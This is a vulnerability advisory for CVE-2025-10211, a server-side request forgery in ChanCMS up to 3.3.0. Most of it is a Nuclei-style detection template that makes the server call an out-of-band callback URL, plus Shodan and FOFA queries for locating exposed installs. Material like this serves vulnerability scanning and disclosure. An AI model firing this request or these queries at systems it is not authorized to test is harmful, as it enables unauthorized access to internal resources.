CVE-2025-10211: ChanCMS <= 3.3.0 - Server-Side Request Forgery

2025-12-02 ChanCMS PoC Public

Description

yanyutao0402 ChanCMS 3.3.0 contains a server-side request forgery caused by manipulation of the "taskUrl" argument in /cms/collect/getArticle, letting remote attackers make arbitrary requests, exploit requires no special privileges.

PoC

id: CVE-2025-10211

info:
  name: ChanCMS <= 3.3.0 - Server-Side Request Forgery
  author: Yu_Bao
  severity: medium
  description: |
    yanyutao0402 ChanCMS 3.3.0 contains a server-side request forgery caused by manipulation of the "taskUrl" argument in /cms/collect/getArticle, letting remote attackers make arbitrary requests, exploit requires no special privileges.
  impact: |
    Remote attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
  remediation: |
    Update to the latest version of ChanCMS.
  reference:
    - https://gitee.com/yanyutao0402/ChanCMS
    - https://vuldb.com/?id.323484
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2025-10211
    epss-score: 0.00705
    epss-percentile: 0.51631
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ChanCMS"
    fofa-query: body="ChanCMS"
  tags: cve,cve2025,chancms,ssrf,oast,oob,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/cms/collect/getArticle"

    headers:
      Content-Type: application/json

    body: |
      {
        "taskUrl": "http://{{interactsh-url}}",
        "titleTag": "title",
        "articleTag": "body",
        "parseData": "return data;"
      }

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(response, 'success','article')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022009cc6d05de21df36943e8a6dd13b55620cff3d4a23f7b5972136aeeb2df955eb022100a9051ac87506eead1aa29afb6aa3aed4821d4162dde81d300f6fbd1ac0704cb8:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities